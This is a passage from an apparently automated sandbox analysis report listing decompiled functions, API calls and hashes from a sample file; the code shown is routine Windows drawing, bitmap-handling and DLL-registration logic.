0x0041ac75
0x0041ac8a
0x0041ac9e
0x0041acc4
0x0041acce
0x0041acdb
0x0041ace4
0x0041ace4
0x0041aced

APIs

SetBkColor.GDI32(?,00000000), ref: 0041ABD1
740C97E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AC0B
SetBkColor.GDI32(?,?), ref: 0041AC20
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AC6A
SetTextColor.GDI32(00000000,00000000), ref: 0041AC75
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AC85
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041ACC4
SetTextColor.GDI32(00000000,00000000), ref: 0041ACCE
SetBkColor.GDI32(00000000,?), ref: 0041ACDB

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Color$StretchText
String ID:
API String ID: 2984075790-0
Opcode ID: 984f175b13612a11af57b7436f75d8d23a7d48d7ecd254167638d9b52b3c86df
Instruction ID: ac43699d37406ab43c6c9b1dba72ff685023c91366463ea0c5b4937a825552c7
Opcode Fuzzy Hash: 984f175b13612a11af57b7436f75d8d23a7d48d7ecd254167638d9b52b3c86df
Instruction Fuzzy Hash: 5D61D6B5A00115AFCB40EFADD985E9EB7F8BF48304B1085A9F558DB252D734ED40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041AAF4 Relevance: 13.7, APIs: 9, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041AAF4(intOrPtr* __eax, intOrPtr __ecx, int* __edx, intOrPtr _a4, int* _a8) {
				intOrPtr _v8;
				long _v12;
				int _v16;
				int _v20;
				void* __edi;
				void* __ebp;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr _t70;
				void* _t71;
				void* _t74;
				long _t77;
				intOrPtr _t89;
				long _t115;
				intOrPtr _t120;
				intOrPtr* _t138;
				intOrPtr* _t140;
				intOrPtr _t144;
				int* _t146;
				intOrPtr _t150;
				intOrPtr _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				int* _t160;
				intOrPtr* _t162;

				_t147 = __ecx;
				_v8 = __ecx;
				_t146 = __edx;
				_t162 = __eax;
				_t160 = _a8;
				if(_v8 != 0) {
					 *((intOrPtr*)( *__eax + 0x10))();
					_v16 = _t160[2] -  *_t160;
					_v20 = _t160[3] - _t160[1];
					_t150 =  *0x41acf0; // 0x1
					E0041B380(__eax, __ecx, _t150, _t160);
					if( *0x48c540 == 0) {
						 *0x48c540 = E0041CF3C(1);
						_t144 =  *0x48c540; // 0x0
						E0041DA7C(_t144, 1);
					}
					_t66 =  *0x48c540; // 0x0
					if( *((intOrPtr*)( *_t66 + 0x20))() < _v16) {
						_t140 =  *0x48c540; // 0x0
						_t147 =  *_t140;
						 *((intOrPtr*)( *_t140 + 0x2c))();
					}
					_t68 =  *0x48c540; // 0x0
					_t152 =  *_t68;
					if( *((intOrPtr*)( *_t68 + 0x1c))() < _v20) {
						_t152 = _v20;
						_t138 =  *0x48c540; // 0x0
						_t147 =  *_t138;
						 *((intOrPtr*)( *_t138 + 0x28))();
					}
					_t70 =  *0x48c540; // 0x0
					_t71 = E0041D2E8(_t70, _t147, _t152);
					_t153 =  *0x41acf0; // 0x1
					E0041B380(_t71, _t147, _t153, _t160);
					_t74 = E0041D2E8(_v8, _t147, _t153);
					_t154 =  *0x41acf0; // 0x1
					E0041B380(_t74, _t147, _t154, _t160);
					_t77 = E0041A270(_a4);
					_v12 = SetBkColor( *(E0041D2E8(_v8, _t147, _t154) + 4), _t77);
					_t89 =  *0x48c540; // 0x0
					L00405CB4();
					SetBkColor( *(E0041D2E8(_v8, _t147, _t154) + 4), _v12);
					_t155 =  *0x41acf4; // 0x9
					E0041B380(_t162, _t147, _t155, _t160);
					StretchBlt( *(_t162 + 4),  *_t146, _t146[1], _t146[2] -  *_t146, _t146[3] - _t146[1],  *(E0041D2E8(_v8, _t147, _t155) + 4),  *_t160, _t160[1], _v16, _v20, 0xcc0020);
					_t115 = SetTextColor( *(_t162 + 4), 0);
					_v12 = SetBkColor( *(_t162 + 4), 0xffffff);
					_t120 =  *0x48c540; // 0x0
					StretchBlt( *(_t162 + 4),  *_t146, _t146[1], _t146[2] -  *_t146, _t146[3] - _t146[1],  *(E0041D2E8(_t120, _t147, _t155) + 4), 0, 0, _v16, _v20, 0xe20746);
					SetTextColor( *(_t162 + 4), _t115);
					SetBkColor( *(_t162 + 4), _v12);
					return  *((intOrPtr*)( *_t162 + 0xc))( *((intOrPtr*)(E0041D2E8(_t89, _t147, _t154) + 4)), 0, 0, _v16, _v20,  *(E0041D2E8(_v8, _t147, _t154) + 4),  *_t160, _t160[1], 0xcc0020);
				}
				return __eax;
			}

0x0041aaf4
0x0041aafd
0x0041ab00
0x0041ab02
0x0041ab04
0x0041ab0b
0x0041ab15
0x0041ab1d
0x0041ab26
0x0041ab29
0x0041ab31
0x0041ab3d
0x0041ab4b
0x0041ab52
0x0041ab57
0x0041ab57
0x0041ab5c
0x0041ab69
0x0041ab6e
0x0041ab73
0x0041ab75
0x0041ab75
0x0041ab78
0x0041ab7d
0x0041ab85
0x0041ab87
0x0041ab8a
0x0041ab8f
0x0041ab91
0x0041ab91
0x0041ab94
0x0041ab99
0x0041ab9e
0x0041aba4
0x0041abac
0x0041abb1
0x0041abb7
0x0041abbf
0x0041abd6
0x0041abfd
0x0041ac0b
0x0041ac20
0x0041ac25
0x0041ac2d
0x0041ac6a
0x0041ac75
0x0041ac8a
0x0041ac9e
0x0041acc4
0x0041acce
0x0041acdb
0x00000000
0x0041ace4
0x0041aced

APIs

SetBkColor.GDI32(?,00000000), ref: 0041ABD1
740C97E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AC0B
SetBkColor.GDI32(?,?), ref: 0041AC20
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AC6A
SetTextColor.GDI32(00000000,00000000), ref: 0041AC75
SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AC85
StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041ACC4
SetTextColor.GDI32(00000000,00000000), ref: 0041ACCE
SetBkColor.GDI32(00000000,?), ref: 0041ACDB

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Color$StretchText
String ID:
API String ID: 2984075790-0
Opcode ID: 0e42e210408f4cff53be1a957847e29dbad9e2e9e793c21c809a38564ae3d52e
Instruction ID: 478a815f40a6f48c54b78f0d2b5a60a0b1801f14ab7d1e6ec529a82d7052d87a
Opcode Fuzzy Hash: 0e42e210408f4cff53be1a957847e29dbad9e2e9e793c21c809a38564ae3d52e
Instruction Fuzzy Hash: D661D6B5A00115AFCB40EFADD985E9EB7F8BF48304B1085A9F558DB252D734ED40CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044D1EC Relevance: 13.6, APIs: 9, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044D1EC(void* __eax, int __ecx, struct tagRECT* __edx, char _a4, intOrPtr _a8) {
				int _t23;
				CHAR* _t25;
				long _t37;
				int _t44;
				CHAR* _t46;
				long _t53;
				int _t60;
				CHAR* _t62;
				void* _t68;

				_t72 = __ecx;
				_t73 = __edx;
				_t68 = __eax;
				_t74 = _a4;
				if(_a4 == 0) {
					_t23 = E004036BC(__eax);
					_t25 = E00403880(_t68);
					return DrawTextA(E0041B2AC( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t25, _t23, __edx, __ecx);
				}
				E0041A97C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104)) + 0x14)), 1, _t74);
				OffsetRect(_t73, 1, 1);
				_t37 = GetSysColor(0x14);
				SetTextColor(E0041B2AC( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t37);
				_t44 = E004036BC(_t68);
				_t46 = E00403880(_t68);
				DrawTextA(E0041B2AC( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t46, _t44, _t73, _t72);
				OffsetRect(_t73, 0xffffffff, 0xffffffff);
				_t53 = GetSysColor(0x10);
				SetTextColor(E0041B2AC( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t53);
				_t60 = E004036BC(_t68);
				_t62 = E00403880(_t68);
				return DrawTextA(E0041B2AC( *((intOrPtr*)( *((intOrPtr*)(_a8 - 4)) + 0x104))), _t62, _t60, _t73, _t72);
			}

0x0044d1f2
0x0044d1f4
0x0044d1f6
0x0044d1f8
0x0044d1fc
0x0044d2c2
0x0044d2ca
0x00000000
0x0044d2e2
0x0044d213
0x0044d21d
0x0044d224
0x0044d23c
0x0044d245
0x0044d24d
0x0044d265
0x0044d26f
0x0044d276
0x0044d28e
0x0044d297
0x0044d29f
0x00000000

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0044D21D
GetSysColor.USER32(00000014), ref: 0044D224
SetTextColor.GDI32(00000000,00000000), ref: 0044D23C
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D265
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D26F
GetSysColor.USER32(00000010), ref: 0044D276
SetTextColor.GDI32(00000000,00000000), ref: 0044D28E
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D2B7
DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D2E2

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Text$Color$Draw$OffsetRect
String ID:
API String ID: 1005981011-0
Opcode ID: 49c7db1bf2a4956b9f66fbc1fb4b0300bc417fc3d2e2325f0c45fec8b88b1112
Instruction ID: 45f888fbc3a0883b3cc6f89eee24c77fc9ee9234cf2cf3117d782b91a1622e0d
Opcode Fuzzy Hash: 49c7db1bf2a4956b9f66fbc1fb4b0300bc417fc3d2e2325f0c45fec8b88b1112
Instruction Fuzzy Hash: 2821CCB42015006FC710FF6ACD8AE8B7BDC9F09319B0145BAB958EB393C679DD448A68

Uniqueness

Uniqueness Score: -1.00%

Function 0041B884 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144
windowCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041B884(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v14;
				struct HWND__* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				signed int _v44;
				intOrPtr _v62;
				short _v64;
				void _v76;
				intOrPtr _t71;
				intOrPtr _t79;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t95;
				void* _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr* _t123;
				intOrPtr* _t125;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				intOrPtr _t130;

				_t117 = __edi;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffb8;
				_push(__edi);
				_v12 = __ecx;
				_v8 = __edx;
				_t123 = __eax;
				_t108 =  &_v76 + 4;
				 *((intOrPtr*)( *__eax))();
				_v76 = _a8;
				if(_v64 != 1) {
					E0041B594();
				}
				_t132 = _v44;
				if(_v44 == 0) {
					_v44 = E0041B700(_v62);
				}
				_v14 = _v44 << 2;
				_v32 = E00406A40((_v14 & 0x0000ffff) + 0x28, _t108, _t117, _t132);
				 *[fs:ecx] = _t129;
				_t95 = _v32;
				memcpy(_t95,  &_v76, 0xa << 2);
				_t130 = _t129 + 0xc;
				_t125 = _t123;
				_t121 =  *_t125;
				 *((intOrPtr*)( *_t125))( *[fs:ecx], 0x41ba78, _t127);
				 *_v12 = E0041B720(_v32);
				_a4 = _a4 - (_v14 & 0x0000ffff) + 0x28;
				_t113 =  *((intOrPtr*)(_t95 + 0x14));
				if(_t113 != 0) {
					_t134 = _t113 - _a4;
					if(_t113 < _a4) {
						_a4 = _t113;
					}
				}
				_v28 = E00406A40(_a4, _t113, _t121, _t134);
				 *[fs:eax] = _t130;
				 *((intOrPtr*)( *_t125))( *[fs:eax], 0x41ba54, _t127);
				_v20 = GetFocus();
				_t71 = _v20;
				_push(_t71);
				L00406034();
				_v24 = _t71;
				if(_v24 == 0) {
					E0041B5AC();
				}
				_push(_t127);
				_push(0x41ba34);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130;
				if( *_v12 == 0) {
					__eflags = 0;
					_v36 = 0;
				} else {
					_push(0);
					_push( *_v12);
					_t87 = _v24;
					_push(_t87);
					L00405E34();
					_v36 = _t87;
					_push(_v24);
					L00405DF4();
				}
				_push(_t127);
				_push(0x41ba12);
				_push( *[fs:eax]);
				 *[fs:eax] = _t130;
				_push(0);
				_push(_v32);
				_push(_v28);
				_push(4);
				_push(_v32);
				_t79 = _v24;
				_push(_t79);
				L00405CE4();
				 *_v8 = _t79;
				if( *_v8 == 0) {
					E0041B5AC();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_push(E0041BA19);
				if(_v36 != 0) {
					_push(0);
					_push(_v36);
					_t83 = _v24;
					_push(_t83);
					L00405E34();
					return _t83;
				}
				return 0;
			}

0x0041b884
0x0041b885
0x0041b887
0x0041b88c
0x0041b88d
0x0041b890
0x0041b893
0x0041b898
0x0041b8a4
0x0041b8a9
0x0041b8b1
0x0041b8b3
0x0041b8b3
0x0041b8b8
0x0041b8bc
0x0041b8c7
0x0041b8c7
0x0041b8d1
0x0041b8e1
0x0041b8ef
0x0041b8f2
0x0041b900
0x0041b900
0x0041b902
0x0041b90c
0x0041b90e
0x0041b91b
0x0041b926
0x0041b929
0x0041b92e
0x0041b930
0x0041b933
0x0041b935
0x0041b935
0x0041b933
0x0041b940
0x0041b94e
0x0041b95b
0x0041b962
0x0041b965
0x0041b968
0x0041b969
0x0041b96e
0x0041b975
0x0041b977
0x0041b977
0x0041b97e
0x0041b97f
0x0041b984
0x0041b987
0x0041b990
0x0041b9b1
0x0041b9b3
0x0041b992
0x0041b992
0x0041b999
0x0041b99a
0x0041b99d
0x0041b99e
0x0041b9a3
0x0041b9a9
0x0041b9aa
0x0041b9aa
0x0041b9b8
0x0041b9b9
0x0041b9be
0x0041b9c1
0x0041b9c4
0x0041b9c9
0x0041b9cd
0x0041b9ce
0x0041b9d3
0x0041b9d4
0x0041b9d7
0x0041b9d8
0x0041b9e0
0x0041b9e8
0x0041b9ea
0x0041b9ea
0x0041b9f1
0x0041b9f4
0x0041b9f7
0x0041ba00
0x0041ba02
0x0041ba07
0x0041ba08
0x0041ba0b
0x0041ba0c
0x00000000
0x0041ba0c
0x0041ba11

APIs

GetFocus.USER32 ref: 0041B95D
740BAC50.USER32(?), ref: 0041B969
740BB410.GDI32(00000000,?,00000000,00000000,0041BA34,?,?), ref: 0041B99E
740BB150.GDI32(00000000,00000000,?,00000000,00000000,0041BA34,?,?), ref: 0041B9AA
740BA7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BA12,?,00000000,0041BA34,?,?), ref: 0041B9D8
740BB410.GDI32(00000000,00000000,00000000,0041BA19,?,?,00000000,00000000,0041BA12,?,00000000,0041BA34,?,?), ref: 0041BA0C

Strings

onG, xrefs: 0041B88C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B410$B150Focus
String ID: onG
API String ID: 1979529269-2936850197
Opcode ID: 33ec576b2753f52c0c80b264cd9955023d09ad76a9aa2f424206a0ebf7f86687
Instruction ID: 0c5f43d94a76aef095475e707550d6e8f25822560241b095067cdff6047a1086
Opcode Fuzzy Hash: 33ec576b2753f52c0c80b264cd9955023d09ad76a9aa2f424206a0ebf7f86687
Instruction Fuzzy Hash: 97512A70A00208AFDF11DFA9C895AEEBBB9EF49704F11406AF504A7350D7799981CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB54 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142
windowCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041BB54(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v14;
				struct HWND__* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v40;
				intOrPtr _v42;
				short _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr* _t65;
				intOrPtr _t73;
				intOrPtr _t80;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr* _t94;
				void* _t104;
				signed int _t110;
				intOrPtr _t116;
				intOrPtr* _t121;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				signed int _t129;

				_t124 = _t125;
				_t126 = _t125 + 0xffffffd0;
				_push(__edi);
				_v12 = __ecx;
				_v8 = __edx;
				_t121 = __eax;
				_t104 =  &_v52 + 4;
				 *((intOrPtr*)( *__eax))();
				_v52 = _a8;
				_t127 = _v44 - 1;
				if(_v44 != 1) {
					E0041B594();
				}
				_v14 = E0041B700(_v42) + _t53 * 2;
				_v32 = E00406A40((_v14 & 0x0000ffff) + 0xf, _t104, _v14 & 0x0000ffff, _t127);
				 *[fs:edx] = _t126;
				_t94 = _v32;
				 *_t94 = _v52;
				 *((intOrPtr*)(_t94 + 4)) = _v48;
				 *((intOrPtr*)(_t94 + 8)) = _v44;
				_t119 =  *_t121;
				 *((intOrPtr*)( *_t121))( *[fs:edx], 0x41bd45, _t124);
				 *_v12 = E0041BA88(_v32, _t94 + 0xc, _t127);
				_t65 = _t94;
				_t110 = ( *(_t65 + 4) & 0x0000ffff) * ( *(_t65 + 0xa) & 0x0000ffff) + 0x1f;
				if(_t110 < 0) {
					_t110 = _t110 + 0x1f;
					_t129 = _t110;
				}
				_v40 = (_t110 >> 5 << 2) * ( *(_t65 + 6) & 0x0000ffff);
				_v28 = E00406A40(_v40, (_t110 >> 5 << 2) * ( *(_t65 + 6) & 0x0000ffff), _t119, _t129);
				 *[fs:eax] = _t126;
				 *((intOrPtr*)( *_t121))( *[fs:eax], 0x41bd21, _t124);
				_v20 = GetFocus();
				_t73 = _v20;
				_push(_t73);
				L00406034();
				_v24 = _t73;
				if(_v24 == 0) {
					E0041B5AC();
				}
				_push(_t124);
				_push(0x41bd01);
				_push( *[fs:eax]);
				 *[fs:eax] = _t126;
				_v36 = 0;
				if( *_v12 != 0) {
					_push(0);
					_push( *_v12);
					_t88 = _v24;
					_push(_t88);
					L00405E34();
					_v36 = _t88;
					_push(_v24);
					L00405DF4();
				}
				_push(_t124);
				_push(0x41bcdf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t126;
				_push(0);
				_push(_v32);
				_push(_v28);
				_push(4);
				_push(_t94);
				_t80 = _v24;
				_push(_t80);
				L00405CE4();
				 *_v8 = _t80;
				if( *_v8 == 0) {
					E0041B5AC();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_push(E0041BCE6);
				if(_v36 != 0) {
					_push(0);
					_push(_v36);
					_t84 = _v24;
					_push(_t84);
					L00405E34();
					return _t84;
				}
				return 0;
			}

0x0041bb55
0x0041bb57
0x0041bb5c
0x0041bb5d
0x0041bb60
0x0041bb63
0x0041bb68
0x0041bb74
0x0041bb79
0x0041bb7c
0x0041bb81
0x0041bb83
0x0041bb83
0x0041bb94
0x0041bba6
0x0041bbb4
0x0041bbb7
0x0041bbbd
0x0041bbc2
0x0041bbc8
0x0041bbd2
0x0041bbd4
0x0041bbe1
0x0041bbe3
0x0041bbf0
0x0041bbf5
0x0041bbf7
0x0041bbf7
0x0041bbf7
0x0041bc07
0x0041bc12
0x0041bc20
0x0041bc2d
0x0041bc34
0x0041bc37
0x0041bc3a
0x0041bc3b
0x0041bc40
0x0041bc47
0x0041bc49
0x0041bc49
0x0041bc50
0x0041bc51
0x0041bc56
0x0041bc59
0x0041bc5e
0x0041bc67
0x0041bc69
0x0041bc70
0x0041bc71
0x0041bc74
0x0041bc75
0x0041bc7a
0x0041bc80
0x0041bc81
0x0041bc81
0x0041bc88
0x0041bc89
0x0041bc8e
0x0041bc91
0x0041bc94
0x0041bc99
0x0041bc9d
0x0041bc9e
0x0041bca0
0x0041bca1
0x0041bca4
0x0041bca5
0x0041bcad
0x0041bcb5
0x0041bcb7
0x0041bcb7
0x0041bcbe
0x0041bcc1
0x0041bcc4
0x0041bccd
0x0041bccf
0x0041bcd4
0x0041bcd5
0x0041bcd8
0x0041bcd9
0x00000000
0x0041bcd9
0x0041bcde

APIs

GetFocus.USER32 ref: 0041BC2F
740BAC50.USER32(?), ref: 0041BC3B
740BB410.GDI32(00000000,?,00000000,00000000,0041BD01,?,?), ref: 0041BC75
740BB150.GDI32(00000000,00000000,?,00000000,00000000,0041BD01,?,?), ref: 0041BC81
740BA7F0.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BCDF,?,00000000,0041BD01,?,?), ref: 0041BCA5
740BB410.GDI32(00000000,00000000,00000000,0041BCE6,?,?,00000000,00000000,0041BCDF,?,00000000,0041BD01,?,?), ref: 0041BCD9

Strings

onG, xrefs: 0041BB5C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B410$B150Focus
String ID: onG
API String ID: 1979529269-2936850197
Opcode ID: 883bbf920345429745a6202467fc2a39e8bdf3c3a5e980705785ee1e2220fc60
Instruction ID: 58a051dd7ec80f1c1874747c658f4fd01d735d844ca6ff3798a409370ca94f50
Opcode Fuzzy Hash: 883bbf920345429745a6202467fc2a39e8bdf3c3a5e980705785ee1e2220fc60
Instruction Fuzzy Hash: AC512974A002189FDB11DFA9C885AAEBBF9FF49704F11846AF504EB751D7389D40CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004541EC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E004541EC(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				struct HICON__* _v16;
				int _v20;
				struct HINSTANCE__* _v24;
				char _v28;
				intOrPtr* _t35;
				void* _t38;
				void* _t54;
				int _t55;
				intOrPtr* _t56;
				intOrPtr _t64;
				void* _t68;
				void* _t70;
				intOrPtr* _t71;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t58 = __ecx;
				_t73 = _t74;
				_t75 = _t74 + 0xffffffe8;
				_push(__ebx);
				_v28 = 0;
				_v8 = 0;
				_v12 = 0;
				_t54 = __ecx;
				_t68 = __edx;
				_t70 = __eax;
				_push(_t73);
				_push(0x454359);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				E00407460( &_v8);
				_v16 = SetCursor(LoadCursorA(0, 0x7f02));
				if(_t54 == 0) {
					_t55 = 0x8000;
				} else {
					_t55 = 0x8001;
				}
				_v20 = SetErrorMode(_t55);
				_push(_t73);
				_push(0x45432f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				E0042D8E0( &_v28);
				E00407488(_v28);
				E0042C990(_t70, _t58,  &_v12);
				if(_v12 != 0) {
					E00407488(_v12);
				}
				_v24 = E0042E324(_t70, _t55, _t55);
				_t78 = _v24;
				if(_v24 == 0) {
					E00451B58("LoadLibrary", _t55, _t58, _t68, _t70, _t78);
				}
				_push(_t73);
				_push(0x454300);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				_push(_t68);
				_t35 = _v24;
				_push(_t35);
				L00405AA4();
				_t71 = _t35;
				_t56 = _t71;
				_t79 = _t71;
				if(_t71 == 0) {
					E00451B58("GetProcAddress", _t56, _t58, _t68, _t71, _t79);
				}
				_t57 =  *_t56();
				_t38 = E004063BC(_t36);
				_t80 = _t38;
				if(_t38 != 0) {
					E00403674( &_v28, _t68);
					E00451C00(_v28, _t57, _t57, _t68, _t71, _t80);
				}
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(E00454307);
				return FreeLibrary(_v24);
			}

0x004541ec
0x004541ed
0x004541ef
0x004541f2
0x004541f7
0x004541fa
0x004541fd
0x00454200
0x00454202
0x00454204
0x00454208
0x00454209
0x0045420e
0x00454211
0x00454217
0x0045422e
0x00454233
0x0045423c
0x00454235
0x00454235
0x00454235
0x00454247
0x0045424c
0x0045424d
0x00454252
0x00454255
0x0045425b
0x00454263
0x0045426d
0x00454276
0x0045427b
0x0045427b
0x00454289
0x0045428c
0x00454290
0x00454297
0x00454297
0x0045429e
0x0045429f
0x004542a4
0x004542a7
0x004542aa
0x004542ab
0x004542ae
0x004542af
0x004542b4
0x004542b6
0x004542b8
0x004542ba
0x004542c1
0x004542c1
0x004542c8
0x004542cc
0x004542d1
0x004542d3
0x004542da
0x004542e4
0x004542e4
0x004542eb
0x004542ee
0x004542f1
0x004542ff

APIs

Part of subcall function 00407460: GetCurrentDirectoryA.KERNEL32(00000104,?,DllRegisterServer,0045421C,00000000,00454359,?,?,00000000,0048D628), ref: 0040746F

LoadCursorA.USER32 ref: 00454223
SetCursor.USER32(00000000,00000000,00007F02,00000000,00454359,?,?,00000000,0048D628), ref: 00454229
SetErrorMode.KERNEL32(00008000,00000000,00000000,00007F02,00000000,00454359,?,?,00000000,0048D628), ref: 00454242
6D2B5550.KERNEL32(00000000,?,00000000,00454300,?,00000000,0045432F,?,00008000,00000000,00000000,00007F02,00000000,00454359), ref: 004542AF
FreeLibrary.KERNEL32(00000000,00454307,?,00008000,00000000,00000000,00007F02,00000000,00454359,?,?,00000000,0048D628), ref: 004542FA

Strings

GetProcAddress, xrefs: 004542BC
LoadLibrary, xrefs: 00454292

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Cursor$B5550CurrentDirectoryErrorFreeLibraryLoadMode
String ID: GetProcAddress$LoadLibrary
API String ID: 2382032797-2209490600
Opcode ID: f9791ef1bb24c076eed2a98132a87f05c2968c358a46d0c40c8d97672d147d67
Instruction ID: 13bb7c330640200b9a328f67ca9048d3421235936be6379206705c47713615fa
Opcode Fuzzy Hash: f9791ef1bb24c076eed2a98132a87f05c2968c358a46d0c40c8d97672d147d67
